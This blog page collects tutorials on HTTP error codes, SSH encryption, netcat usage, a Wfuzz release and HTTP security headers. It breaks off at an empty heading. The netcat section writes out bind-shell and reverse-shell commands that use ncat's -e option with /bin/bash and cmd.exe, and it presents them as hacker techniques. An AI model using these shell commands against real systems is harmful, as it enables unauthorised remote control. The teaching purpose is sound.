Mahesh's Blog

" It's hard to beat a person who believes in his or her own strength. And I believe in mine."

Saturday, November 22, 2014

Common HTTP Error Codes

Introduction

When accessing a web server or application, every HTTP request that is received by a server is responded to with an HTTP status code. HTTP status codes are three-digit codes, and are grouped into five different classes. The class of a status code can be quickly identified by its first digit:
  • 1xx: Informational
  • 2xx: Success
  • 3xx: Redirection
  • 4xx: Client Error
  • 5xx: Server Error
This guide focuses on identifying and troubleshooting the most commonly encountered HTTP error codes, i.e. 4xx and 5xx status codes, from a system administrator's perspective. There are many situations that could cause a web server to respond to a request with a particular error code--we will cover common potential causes and solutions.

Client and Server Error Overview

Client errors, or HTTP status codes from 400 to 499, are the result of HTTP requests sent by a user client (i.e. a web browser or other HTTP client). Even though these types of errors are client-related, it is often useful to know which error code a user is encountering to determine if the potential issue can be fixed by server configuration.
Server errors, or HTTP status codes from 500 to 599, are returned by a web server when it is aware that an error has occurred or is otherwise not able to process the request.

General Troubleshooting Tips

  • When using a web browser to test a web server, refresh the browser after making server changes
  • Check server logs for more details about how the server is handling the requests. For example, web servers such as Apache or Nginx produce two files called access.log and error.log that can be scanned for relevant information
  • Keep in mind that HTTP status code definitions are part of a standard that is implemented by the application that is serving requests. This means that the actual status code that is returned depends on how the server software handles a particular error--this guide should generally point you in the right direction
Now that you have a high-level understanding of HTTP status codes, we will look at the commonly encountered errors.

400 Bad Request

The 400 status code, or Bad Request error, means the HTTP request that was sent to the server has invalid syntax.
Here are a few examples of when a 400 Bad Request error might occur:
  • The user's cookie that is associated with the site is corrupt. Clearing the browser's cache and cookies could solve this issue
  • Malformed request due to a faulty browser
  • Malformed request due to human error when manually forming HTTP requests (e.g. using curl incorrectly)
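If you want to see a 400 response for yourself, you can hand-craft a broken request. A minimal sketch (example.com is a placeholder; most servers reject a header line that is missing its colon, though exact behavior varies by server):
 printf 'GET / HTTP/1.1\r\nHost example.com\r\n\r\n' | nc example.com 80
The first line of the response should read something like HTTP/1.1 400 Bad Request.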

401 Unauthorized

The 401 status code, or an Unauthorized error, means that the user trying to access the resource has not been authenticated or has not been authenticated correctly. This means that the user must provide credentials to be able to view the protected resource.
An example scenario where a 401 Unauthorized error would be returned is if a user tries to access a resource that is protected by HTTP authentication, as in this Nginx tutorial. In this case, the user will receive a 401 response code until they provide a valid username and password (one that exists in the .htpasswd file) to the web server.
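You can watch this exchange with curl. A sketch with a placeholder URL and placeholder credentials (sammy/password); the -i flag prints the status line and response headers:
 curl -i http://example.com/protected/
 curl -i -u sammy:password http://example.com/protected/
The first request should return 401 Unauthorized along with a WWW-Authenticate header; the second should return 200 OK if the credentials match an entry in the .htpasswd file.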

403 Forbidden

The 403 status code, or a Forbidden error, means that the user made a valid request but the server is refusing to serve the request, due to a lack of permission to access the requested resource. If you are encountering a 403 error unexpectedly, there are a few typical causes that are explained here.

File Permissions

403 errors commonly occur when the user that is running the web server process does not have sufficient permissions to read the file that is being accessed.
To give an example of troubleshooting a 403 error, assume the following situation:
  • The user is trying to access the web server's index file, from http://example.com/index.html
  • The web server worker process is owned by the www-data user
  • On the server, the index file is located at /usr/share/nginx/html/index.html
If the user is getting a 403 Forbidden error, ensure that the www-data user has sufficient permissions to read the file. Typically, this means that the other permissions of the file should be set to read. There are several ways to ensure this, but the following command will work in this case:
sudo chmod o=r /usr/share/nginx/html/index.html
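To check the permissions before (or after) changing them, you can inspect every component of the path and then test the read as the worker user. Both commands below are standard on most Linux systems; the path is the one from the example above:
 namei -l /usr/share/nginx/html/index.html
 sudo -u www-data cat /usr/share/nginx/html/index.html
namei -l prints the permissions of each directory leading up to the file, and the cat command succeeds only if the www-data user can actually read it.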

.htaccess

Another potential cause of 403 errors, often intentionally, is the use of an .htaccess file. The .htaccess file can be used to deny specific IP addresses or ranges access to certain resources, for example.
If the user is unexpectedly getting a 403 Forbidden error, ensure that it is not being caused by your .htaccess settings.

Index File Does Not Exist

If the user is trying to access a directory that does not have a default index file, and directory listings are not enabled, the web server will return a 403 Forbidden error. For example, if the user is trying to access http://example.com/emptydir/, and there is no index file in the emptydir directory on the server, a 403 status will be returned.
If you want directory listings to be enabled, you may do so in your web server configuration.
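For example, in Nginx this can be done with the autoindex directive (a sketch using the example directory from above; place it inside the appropriate server block):
 location /emptydir/ {
     autoindex on;
 }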

404 Not Found

The 404 status code, or a Not Found error, means that the user is able to communicate with the server, but the server is unable to locate the requested file or resource.
404 errors can occur in a large variety of situations. If the user is unexpectedly receiving a 404 Not Found error, here are some questions to ask while troubleshooting:
  • Does the link that directed the user to your server resource have a typographical error in it?
  • Did the user type in the wrong URL?
  • Does the file exist in the correct location on the server? Was the resource moved or deleted on the server?
  • Does the server configuration have the correct document root location?
  • Does the user that owns the web server worker process have privileges to traverse to the directory that the requested file is in? (Hint: directories require read and execute permissions to be accessed)
  • Is the resource being accessed a symbolic link? If so, ensure the web server is configured to follow symbolic links
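A quick way to start working through this checklist is to confirm what the server actually returns and whether the file is where the document root expects it. A sketch with a placeholder file name, assuming the Nginx document root used earlier:
 curl -I http://example.com/page.html
 ls -l /usr/share/nginx/html/page.html
curl -I prints only the status line and headers, and the ls command confirms the file's existence, location, and permissions.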

500 Internal Server Error

The 500 status code, or Internal Server Error, means that the server cannot process the request for an unknown reason. Sometimes this code will appear when more specific 5xx errors are more appropriate.
The most common causes of this error are server misconfiguration (e.g. a malformed .htaccess file) or missing packages (e.g. trying to execute a PHP file without PHP installed properly).

502 Bad Gateway

The 502 status code, or Bad Gateway error, means that the server is a gateway or proxy server, and it is not receiving a valid response from the backend servers that should actually fulfill the request.
If the server in question is a reverse proxy server, such as a load balancer, here are a few things to check:
  • The backend servers (where the HTTP requests are being forwarded to) are healthy
  • The reverse proxy is configured properly, with the proper backends specified
  • The network connection between the backend servers and reverse proxy server is healthy. If the servers can communicate on other ports, make sure that the firewall is allowing the traffic between them
  • If your web application is configured to listen on a socket, ensure that the socket exists in the correct location and that it has the proper permissions
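To test the first two items, try sending a request to a backend directly from the proxy server, bypassing the proxy entirely. The backend address below is a placeholder; substitute the host and port (or socket path) from your proxy configuration:
 curl -I http://10.0.0.5:8080/
 ls -l /var/run/app.sock
A healthy response to the first command suggests the backend itself is fine and the problem lies in the proxy configuration or the network path; the second command verifies that a socket exists and shows its owner and permissions.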

503 Service Unavailable

The 503 status code, or Service Unavailable error, means that the server is overloaded or under maintenance. This error implies that the service should become available at some point.
If the server is not under maintenance, this can indicate that the server does not have enough CPU or memory resources to handle all of the incoming requests, or that the web server needs to be configured to allow more users, threads, or processes.

504 Gateway Timeout

The 504 status code, or Gateway Timeout error, means that the server is a gateway or proxy server, and it is not receiving a response from the backend servers within the allowed time period.
This typically occurs in the following situations:
  • The network connection between the servers is poor
  • The backend server that is fulfilling the request is too slow, due to poor performance
  • The gateway or proxy server's timeout duration is too short
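If Nginx is the gateway in question, the relevant timeouts can be raised in the proxy configuration. A sketch (the values are illustrative, not recommendations):
 proxy_connect_timeout 60s;
 proxy_read_timeout 120s;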

SSH Encryption and Connection Process

Introduction

SSH, or secure shell, is a secure protocol and the most common way of safely administering remote servers. Using a number of encryption technologies, SSH provides a mechanism for establishing a cryptographically secured connection between two parties, authenticating each side to the other, and passing commands and output back and forth.

In this guide, we will be examining the underlying encryption techniques that SSH employs and the methods it uses to establish secure connections. This information can be useful for understanding the various layers of encryption and the different steps needed to form a connection and authenticate both parties.

Symmetric Encryption, Asymmetric Encryption, and Hashes

In order to secure the transmission of information, SSH employs a number of different types of data manipulation techniques at various points in the transaction. These include forms of symmetrical encryption, asymmetrical encryption, and hashing.

Symmetrical Encryption

The relationship of the components that encrypt and decrypt data determines whether an encryption scheme is symmetrical or asymmetrical.
Symmetrical encryption is a type of encryption where one key can be used to encrypt messages to the opposite party, and also to decrypt the messages received from the other participant. This means that anyone who holds the key can encrypt and decrypt messages to anyone else holding the key.
This type of encryption scheme is often called "shared secret" encryption, or "secret key" encryption. There is typically only a single key that is used for all operations, or a pair of keys where the relationship is easy to discover and it is trivial to derive the opposite key.
Symmetric keys are used by SSH to encrypt the entire connection. Contrary to what some users assume, the public/private asymmetrical key pairs that can be created are only used for authentication, not for encrypting the connection. The symmetrical encryption allows even password authentication to be protected against snooping.
The client and server both contribute toward establishing this key, and the resulting secret is never known to outside parties. The secret key is created through a process known as a key exchange algorithm. This exchange results in the server and client both arriving at the same key independently by sharing certain pieces of public data and manipulating them with certain secret data. This process is explained in greater detail later on.
The symmetrical encryption key created by this procedure is session-based and constitutes the actual encryption for the data sent between server and client. Once this is established, the rest of the data must be encrypted with this shared secret. This is done prior to authenticating a client.
SSH can be configured to utilize a variety of different symmetrical cipher systems, including AES, Blowfish, 3DES, CAST128, and Arcfour. The server and client can both decide on a list of their supported ciphers, ordered by preference. The first option from the client's list that is available on the server is used as the cipher algorithm in both directions.
On Ubuntu 14.04, both the client and the server default to the following preference list: aes128-ctr, aes192-ctr, aes256-ctr, arcfour256, arcfour128, aes128-gcm@openssh.com, aes256-gcm@openssh.com, chacha20-poly1305@openssh.com, aes128-cbc, blowfish-cbc, cast128-cbc, aes192-cbc, aes256-cbc, arcfour.
This means that if two Ubuntu 14.04 machines are connecting to each other (without overriding the default ciphers through configuration options), they will always use the aes128-ctr cipher to encrypt their connection.
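If you want different behavior, both the OpenSSH client and server accept a Ciphers directive listing the allowed algorithms in order of preference. A sketch for /etc/ssh/sshd_config (restart the SSH daemon after editing):
 Ciphers aes256-ctr,aes192-ctr,aes128-ctr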

Asymmetrical Encryption

Asymmetrical encryption is different from symmetrical encryption in that to send data in a single direction, two associated keys are needed. One of these keys is known as the private key, while the other is called the public key.
The public key can be freely shared with any party. It is associated with its paired key, but the private key cannot be derived from the public key. The mathematical relationship between the public key and the private key allows the public key to encrypt messages that can only be decrypted by the private key. This is a one-way ability, meaning that the public key has no ability to decrypt the messages it writes, nor can it decrypt anything the private key may send it.
The private key should be kept entirely secret and should never be shared with another party. This is a key requirement for the public key paradigm to work. The private key is the only component capable of decrypting messages that were encrypted using the associated public key. By virtue of this fact, any entity capable of decrypting these messages has demonstrated that they are in control of the private key.
SSH utilizes asymmetric encryption in a few different places. During the initial key exchange process used to set up the symmetrical encryption (used to encrypt the session), asymmetrical encryption is used. In this stage, both parties produce temporary key pairs and exchange the public key in order to produce the shared secret that will be used for symmetrical encryption.
The more well-discussed use of asymmetrical encryption with SSH comes from SSH key-based authentication. SSH key pairs can be used to authenticate a client to a server. The client creates a key pair and then uploads the public key to any remote server it wishes to access. This is placed in a file called authorized_keys within the ~/.ssh directory in the user account's home directory on the remote server.
After the symmetrical encryption is established to secure communications between the server and client, the client must authenticate to be allowed access. The server can use the public key in this file to encrypt a challenge message to the client. If the client can prove that it was able to decrypt this message, it has demonstrated that it owns the associated private key. The server then can set up the environment for the client.

Hashing

Another form of data manipulation that SSH takes advantage of is cryptographic hashing. Cryptographic hash functions are methods of creating a succinct "signature" or summary of a set of information. Their main distinguishing attributes are that they are never meant to be reversed, they are virtually impossible to influence predictably, and they are practically unique.
Using the same hashing function and message should produce the same hash; modifying any portion of the data should produce an entirely different hash. A user should not be able to produce the original message from a given hash, but they should be able to tell if a given message produced a given hash.
Given these properties, hashes are mainly used for data integrity purposes and to verify the authenticity of communication. The main use in SSH is with HMAC, or hash-based message authentication codes. These are used to ensure that the received message text is intact and unmodified.
As part of the symmetrical encryption negotiation outlined above, a message authentication code (MAC) algorithm is selected. The algorithm is chosen by working through the client's list of acceptable MAC choices. The first one out of this list that the server supports will be used.
Each message that is sent after the encryption is negotiated must contain a MAC so that the other party can verify the packet integrity. The MAC is calculated from the symmetrical shared secret, the packet sequence number of the message, and the actual message content.
The MAC itself is sent outside of the symmetrically encrypted area as the final part of the packet. Researchers generally recommend this method of encrypting the data first, and then calculating the MAC.

How Does SSH Work?

You probably already have a basic understanding of how SSH works. The SSH protocol employs a client-server model to authenticate two parties and encrypt the data between them.
The server component listens on a designated port for connections. It is responsible for negotiating the secure connection, authenticating the connecting party, and spawning the correct environment if the credentials are accepted.
The client is responsible for beginning the initial TCP handshake with the server, negotiating the secure connection, verifying that the server's identity matches previously recorded information, and providing credentials to authenticate.
An SSH session is established in two separate stages. The first is to agree upon and establish encryption to protect future communication. The second stage is to authenticate the user and discover whether access to the server should be granted.

Negotiating Encryption for the Session

When a TCP connection is made by a client, the server responds with the protocol versions it supports. If the client can match one of the acceptable protocol versions, the connection continues. The server also provides its public host key, which the client can use to check whether this was the intended host.
At this point, both parties negotiate a session key using a version of something called the Diffie-Hellman algorithm. This algorithm (and its variants) make it possible for each party to combine their own private data with public data from the other system to arrive at an identical secret session key.
The session key will be used to encrypt the entire session. The public and private key pairs used for this part of the procedure are completely separate from the SSH keys used to authenticate a client to the server.
The basis of this procedure for classic Diffie-Hellman is:
  1. Both parties agree on a large prime number, which will serve as a seed value.
  2. Both parties agree on a generator (typically a small number such as 2), which will be used to manipulate the values in a predefined way.
  3. Independently, each party comes up with another prime number which is kept secret from the other party. This number is used as the private key for this interaction (different than the private SSH key used for authentication).
  4. The generated private key, the encryption generator, and the shared prime number are used to generate a public key that is derived from the private key, but which can be shared with the other party.
  5. Both participants then exchange their generated public keys.
  6. The receiving entity uses their own private key, the other party's public key, and the original shared prime number to compute a shared secret key. Although this is independently computed by each party, using opposite private and public keys, it will result in the same shared secret key.
  7. The shared secret is then used to encrypt all communication that follows.
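To make the arithmetic concrete, here is a toy run of the exchange with deliberately tiny numbers; a real exchange uses a prime that is hundreds of digits long. The bash snippet below is only for illustration:
 p=23; g=5                            # public: the shared prime and generator
 a=6; b=15                            # private: each party's secret number
 A=$((g**a % p)); B=$((g**b % p))     # exchanged public values: A=8, B=19
 echo $((B**a % p)) $((A**b % p))     # both computations print the same secret: 2 2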
The shared secret encryption that is used for the rest of the connection is called binary packet protocol. The above process allows each party to equally participate in generating the shared secret, which does not allow one end to control the secret. It also accomplishes the task of generating an identical shared secret without ever having to send that information over insecure channels.
The generated secret is a symmetric key, meaning that the same key used to encrypt a message can be used to decrypt it on the other side. The purpose of this is to wrap all further communication in an encrypted tunnel that cannot be deciphered by outsiders.
After the session encryption is established, the user authentication stage begins.

Authenticating the User's Access to the Server

The next stage involves authenticating the user and deciding access. There are a few different methods that can be used for authentication, based on what the server accepts.
The simplest is probably password authentication, in which the server simply prompts the client for the password of the account they are attempting to log in with. The password is sent through the negotiated encryption, so it is secure from outside parties.
Even though the password will be encrypted, this method is not generally recommended due to the limitations on the complexity of the password. Automated scripts can break passwords of normal lengths very easily compared to other authentication methods.
The most popular and recommended alternative is the use of SSH key pairs. SSH key pairs are asymmetric keys, meaning that the two associated keys serve different functions.
The public key is used to encrypt data that can only be decrypted with the private key. The public key can be freely shared, because, although it can encrypt for the private key, there is no method of deriving the private key from the public key.
Authentication using SSH key pairs begins after the symmetric encryption has been established as described in the last section. The procedure happens like this:
  1. The client begins by sending an ID for the key pair it would like to authenticate with to the server.
  2. The server checks the authorized_keys file of the account that the client is attempting to log into for the key ID.
  3. If a public key with matching ID is found in the file, the server generates a random number and uses the public key to encrypt the number.
  4. The server sends the client this encrypted message.
  5. If the client actually has the associated private key, it will be able to decrypt the message using that key, revealing the original number.
  6. The client combines the decrypted number with the shared session key that is being used to encrypt the communication, and calculates the MD5 hash of this value.
  7. The client then sends this MD5 hash back to the server as an answer to the encrypted number message.
  8. The server uses the same shared session key and the original number that it sent to the client to calculate the MD5 value on its own. It compares its own calculation to the one that the client sent back. If these two values match, it proves that the client was in possession of the private key and the client is authenticated.
As you can see, the asymmetry of the keys allows the server to encrypt messages to the client using the public key. The client can then prove that it holds the private key by decrypting the message correctly. The two types of encryption that are used (symmetric shared secret, and asymmetric public-private keys) are each able to leverage their specific strengths in this model.
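Generating and installing such a key pair takes two commands with the standard OpenSSH tools (user and server_ip are placeholders for your own account and server):
 ssh-keygen -t rsa
 ssh-copy-id user@server_ip
The first command creates the private key (~/.ssh/id_rsa) and public key (~/.ssh/id_rsa.pub); the second appends the public key to ~/.ssh/authorized_keys on the remote server.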

Netcat : Introduction

Netcat is a terminal application that is similar to the telnet program but has many more features. It's a "power version" of the traditional telnet program. Apart from basic telnet functions, it can do various other things, like creating socket servers to listen for incoming connections on ports, transferring files from the terminal, and so on. It is a small tool packed with lots of features, which is why it is called the "Swiss-army knife of TCP/IP".
In the Netcat manual, it is defined as:
Netcat is a computer networking utility for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can create almost any kind of connection you would need and has a number of built-in capabilities.
So basically, netcat is a tool for bidirectional network communication over the TCP/UDP protocols. More technically speaking, netcat can act as a socket server or client and interact with other programs, sending and receiving data through the network. Such a definition sounds too generic and makes it difficult to understand what exactly this tool does and what it is useful for. That can really be understood only by using and playing with it.
So the first thing to do is to set up netcat on your machine. Netcat comes in various flavors, meaning it is available from multiple vendors, but most of them have similar functionality. On Ubuntu there are three packages: netcat-openbsd, netcat-traditional, and ncat.
My preferred version is ncat. Ncat, developed by the Nmap team, is the best of all the netcats available; most importantly, it is cross-platform and works very well on Windows.

Ncat – Netcat for the 21st Century

Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.
Download and install netcat
Windows:
The Windows version of netcat can be downloaded from here; simply download and extract the files somewhere suitable.
Alternatively, download the Windows version of ncat from the ncat project site.
Ubuntu/Linux:
Ubuntu's Synaptic package manager has netcat-openbsd and netcat-traditional packages available. Install both of them. Nmap also comes with a netcat implementation called ncat. Install that too.
Project websites
http://nmap.org/ncat/
Install on Ubuntu
sudo apt-get install netcat-traditional netcat-openbsd nmap
To use the netcat-openbsd implementation, use the "nc" command.
To use the netcat-traditional implementation, use the "nc.traditional" command.
To use the nmap ncat implementation, use the "ncat" command.
In the following tutorial we are going to use all of them in different examples in different ways.

1. Telnet

The very first thing netcat can be used as is a telnet program. Let's see how.
nc -v google.com 80
Now netcat is connected to google.com on port 80, and it's time to send some message. Let's try to fetch the index page. For this, type "GET index.html HTTP/1.1" and hit the Enter key twice. Remember, twice.
nc -v google.com 80
Connection to google.com 80 port [tcp/http] succeeded!
GET index.html HTTP/1.1
HTTP/1.1 302 Found
Location: http://www.google.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 18 Aug 2012 06:03:04 GMT
Server: sffe
Content-Length: 219
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>
The output from google.com has been received and echoed on the terminal.

2. Simple socket server

To open a simple socket server type in the following command.
 nc -l -v 1234
The above command tells netcat to listen on TCP port 1234. The -v option gives verbose output for better understanding. Now, from another terminal, try to connect to port 1234 using the telnet command as follows:
telnet localhost 1234
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
abc
ting tong
After connecting, we send some test messages, like abc and ting tong, to the netcat socket server. The netcat socket server will echo back the data received from the telnet client.
nc -l -v 1234
Connection from 127.0.0.1 port 1234 [tcp/*] accepted
abc
ting tong
This makes a complete chat system: type something in the netcat terminal and it will show up in the telnet terminal as well. So this technique can be used for chatting between 2 machines.
Complete ECHO Server
Ncat with the -c option can be used to start an echo server.
Start the echo server using ncat as follows
 ncat -v -l -p 5555 -c 'while true; do read i && echo [echo] $i; done'
Now from another terminal, connect using telnet and type something. It will be sent back with "[echo]" prefixed.
The netcat-openbsd version does not have the -c option. Remember to always use the -v option for verbose output.
Note: Netcat can be told to save the data to a file instead of echoing it to the terminal.
 nc -l -v 1234 > data.txt
UDP ports
Netcat works with UDP ports as well. To start a netcat server listening on a UDP port, use the -u option:
 nc -v -ul 7000
Connect to this server using netcat from another terminal
 nc localhost -u 7000
Now both terminals can chat with each other.

3. File transfer

A whole file can be transferred with netcat. Here is a quick example.
On machine A – Send File
 cat happy.txt | ncat -v -l -p 5555
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:5555
In the above command, the cat command reads and outputs the content of happy.txt. The output is not echoed to the terminal, instead is piped or fed to ncat which has opened a socket server on port 5555.
On machine B – Receive File
 ncat localhost 5555 > happy_copy.txt
In the above command, ncat will connect to localhost on port 5555, and whatever it receives will be written to happy_copy.txt. (On a real second machine, replace localhost with machine A's IP address.)
Now happy_copy.txt will be a copy of happy.txt, since the data being sent over port 5555 is the content of happy.txt from the previous command.
Netcat will send the file only to the first client that connects to it; after that, it's over. Once the first client closes its connection, the netcat server will close down as well.
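To confirm the transfer was complete and intact, compare checksums of the two files (md5sum is part of coreutils; in this localhost demo both files are on the same machine, so you can compare them directly):
 md5sum happy.txt happy_copy.txt
The two hashes should be identical.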

4. Port scanning

Netcat can also be used for port scanning. However, this is not a proper use of netcat, and a more suitable tool like nmap should be used for real scanning work.
 nc -v -n -z -w 1 192.168.1.2 75-85
nc: connect to 192.168.1.2 port 75 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 76 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 77 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 78 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 79 (tcp) failed: Connection refused
Connection to 192.168.1.2 80 port [tcp/*] succeeded!
nc: connect to 192.168.1.2 port 81 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 82 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 83 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 84 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 85 (tcp) failed: Connection refused
The "-n" parameter here prevents DNS lookup, "-z" enables zero-I/O mode so nc does not send or receive any data beyond the connection itself, and "-w 1" makes the connection time out after 1 second of inactivity.

5. Remote Shell/Backdoor

Ncat can be used to start a basic shell on a remote system on a port without the need of ssh. Here is a quick example.
 ncat -v -l -p 7777 -e /bin/bash
The above will start a server on port 7777 and will pass all incoming input to the bash command, and the results will be sent back. The command effectively converts the bash program into a server; netcat can be used in this way to convert any process into a server.
Connect to this bash shell using nc from another terminal
 nc localhost 7777
Now try executing commands like help, ls, pwd, etc.
Windows
On a Windows machine, cmd.exe (the DOS prompt program) is used to start a similar shell with netcat. The syntax of the command is the same.
C:\tools\nc>nc -v -l -n -p 8888 -e cmd.exe
listening on [any] 8888 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 1182
Now another console can connect using the telnet command.
Although netcat can be used to set up remote shells, this is not that useful for getting an interactive shell on a remote system, because in most cases netcat would not be installed on the remote system.
The most effective method to get a shell on a remote machine using netcat is by creating reverse shells.

6. Reverse Shells

This is the most powerful feature of netcat, and the one for which it is most used by hackers. Netcat is used in almost all reverse shell techniques to catch the reverse connection of a shell program from a hacked system.
Reverse telnet
First, let's take an example of a simple reverse telnet connection. In an ordinary telnet connection, the client connects to the server to start a communication channel.
Your system runs (# telnet server port_number) =============> Server

Now using the above technique, you can connect to, say, port 80 of the server to fetch a webpage. However, a hacker is interested in getting a command shell: the command prompt on Windows or the terminal on Linux. The command shell gives ultimate control of the remote system. The problem is that there is no service running on the remote server to which you can connect and get a command shell.
So when a hacker hacks into a system, he needs to get a command shell. Since this is not possible directly, the solution is to use a reverse shell: the server initiates a connection to the hacker's machine and hands over a command shell.
Step 1 : Hacker machine (waiting for incoming connection)
Step 2 : Server ==============> Hacker machine

To wait for incoming connections, a local socket listener has to be opened. Netcat/ncat can do this.
First a netcat server has to be started on local machine or the hacker’s machine.
machine A
 ncat -v -l -p 8888
Ncat: Version 6.00 ( http://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
The above will start a socket server (listener) on port 8888 on local machine/hacker’s machine.
Now a reverse shell has to be launched on the target machine/hacked machine. There are a number of ways to launch reverse shells.
For any method to work, the hacker either needs to be able to execute arbitrary commands on the system or should be able to upload a file that can be executed by opening it from the browser (like a PHP script).
In this example we are not doing either of the above mentioned things. We shall just run netcat on the server also to throw a reverse command shell to demonstrate the concept. So netcat should be installed on the server or target machine.
Machine B :
 ncat localhost 8888 -e /bin/bash
This command will connect to machine A on port 8888 and attach bash's input and output to the connection, effectively giving a shell to machine A. Now machine A can execute any command on machine B.
Machine A
ncat -v -l -p 8888
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 127.0.0.1.
pwd
/home/enlightened
In a real penetration testing scenario, it is usually not possible to run netcat on the target machine. Therefore, other techniques are employed to create a shell: uploading reverse shell PHP scripts and running them by opening them in the browser, or launching a buffer overflow exploit that executes a reverse shell payload.

Wfuzz 2.1 released !

Wfuzz is a tool designed for brute-forcing web applications. It can be used for finding resources that are not linked (directories, servlets, scripts, etc.), brute-forcing GET and POST parameters to check for different kinds of injections, brute-forcing form parameters (user/password), fuzzing, and more.

The biggest change is that wfuzz now supports plugins, so you can code your scripts and improve or modify the application's functionality. For example, there is a plugin that parses links within the HTTP response and these will be added to the fuzzing queue. Check below how a single word "a" generates 8 different requests:



 $ python wfuzz.py --script=links -z list,a --follow  http://localhost:8000/FUZZ
********************************************************
* Wfuzz 2.1 - The Web Bruteforcer                      *
********************************************************

Target: http://localhost:8000/FUZZ
Total requests: 1

===========================================
ID      Response   Lines      Word         Chars          Request  
===========================================
00000:  C=200     17 L        89 W         1481 Ch        "a"
  |_ Plugin links enqueued 5 more requests (rlevel=1)
00001:  C=200     14 L        57 W          889 Ch        "/a/b/"
  |_ Plugin links enqueued 2 more requests (rlevel=2)
00002:  C=200      4 L        25 W          177 Ch        "/"
00003:  C=200      9 L         7 W           61 Ch        "/a/test.html"
00004:  C=200      4 L         6 W           47 Ch        "/a/test.js"
00005:  C=403     10 L        30 W          285 Ch        "/icons/"
00006:  C=200     17 L        89 W         1481 Ch        "/a/"
00007:  C=200     14 L        57 W          895 Ch        "/a/b/c/"
  |_ Plugin links enqueued 1 more requests (rlevel=3)
00008:  C=200     13 L        46 W          716 Ch        "/a/b/c/d/"

Guidelines for Setting HTTP Security Headers

X-XSS-Protection

Purpose

This response header can be used to configure a user-agent's built in reflective XSS protection. Currently, only Microsoft's Internet Explorer, Google Chrome and Safari (WebKit) support this header.

Valid Settings

  • 0 - Disables the XSS Protections offered by the user-agent.
  • 1 - Enables the XSS Protections
  • 1; mode=block - Enables XSS protections and instructs the user-agent to block the response in the event that script has been inserted from user input, instead of sanitizing.
  • 1; report=http://site.com/report - A Chrome and WebKit only directive that tells the user-agent to report potential XSS attacks to a single URL. Data will be POST'd to the report URL in JSON format.
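To deploy one of these values, the header just needs to be added to responses. Assuming Nginx, a one-line sketch:
 add_header X-XSS-Protection "1; mode=block";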

Common Invalid Settings

  • 0; mode=block; - A common misconfiguration where the 0 value will disable protections even though the mode=block is defined. It should be noted that Chrome has been enhanced to fail closed and treat this as an invalid setting but still keep default XSS protections in place.
  • 1 mode=block; - All directives must be separated by a ;. Spaces and , are invalid separators. However, IE and Chrome will default to sanitizing the XSS in this case but not enable blocking mode as everything after the 1 is considered invalid.

How To Test

Internet Explorer will display a dialog box if reflective XSS was detected and sanitized or blocked. Chrome will hide the output of the reflective XSS attack in the response when it is set to 1. When it is set to 1; mode=block, Chrome will redirect the user-agent to an empty data:, URL.

X-Content-Type-Options

Purpose

This header can be set to protect against MIME type confusion attacks in Internet Explorer 9, Chrome and Safari. Firefox is currently debating the implementation. Content sniffing is a method browsers use to attempt to determine the 'real' content type of a response by looking at the content itself, instead of the response header's content-type value. By returning X-Content-Type-Options: nosniff, certain elements will only load external resources if their content-type matches what is expected. As an example, if a stylesheet is being loaded, the MIME type of the resource must match "text/css". For script resources in Internet Explorer, the following content types are valid:
  1. application/ecmascript
  2. application/javascript
  3. application/x-javascript
  4. text/ecmascript
  5. text/javascript
  6. text/jscript
  7. text/x-javascript
  8. text/vbs
  9. text/vbscript
For Chrome, the following are supported MIME types:
  1. text/javascript
  2. text/ecmascript
  3. application/javascript
  4. application/ecmascript
  5. application/x-javascript
  6. text/javascript1.1
  7. text/javascript1.2
  8. text/javascript1.3
  9. text/jscript
  10. text/livescript

Valid Settings

  • nosniff - This is the only valid setting, it must match nosniff.
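Since the only valid value is the fixed token nosniff, deploying it is a single directive. Assuming Nginx again, a sketch:
 add_header X-Content-Type-Options nosniff;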

Common Invalid Settings

  • 'nosniff' - Quotes are not allowed.
  • : nosniff - Incorrectly adding an additional : is also invalid.

How To Test

Open the developer panel in Internet Explorer or Chrome and observe the difference in the console output between having nosniff set and not having it set.

X-Frame-Options

Purpose

This header is for configuring which sites are allowed to frame the loaded resource. Its primary purpose is to protect against UI redressing style attacks. Internet Explorer has supported the ALLOW-FROM directive since IE8 and Firefox from 18. Both Chrome and Safari do not support ALLOW-FROM, however WebKit is currently discussing it.

Valid Settings

  • DENY - Denies any resource (local or remote) from attempting to frame the resource that also supplied the X-Frame-Options header.
  • SAMEORIGIN - Allows only resources that are part of the same origin (per the same-origin policy) to frame the protected resource.
  • ALLOW-FROM http://www.example.com - Allows a single serialized-origin (must have scheme) to frame the protected resource. This is only valid in Internet Explorer and Firefox. The default of other browsers is to allow any origin (as if X-Frame-Options was not set).
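For the common case where only your own pages should be allowed to frame the resource, an Nginx sketch:
 add_header X-Frame-Options SAMEORIGIN;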

Common Invalid Settings

  • ALLOW FROM http://example.com - The ALLOW-FROM directive must use the hyphen character, not a space between allow and from.
  • ALLOW-FROM example.com - The ALLOW-FROM directive must use a URI with a valid scheme (http or https).

How To Test

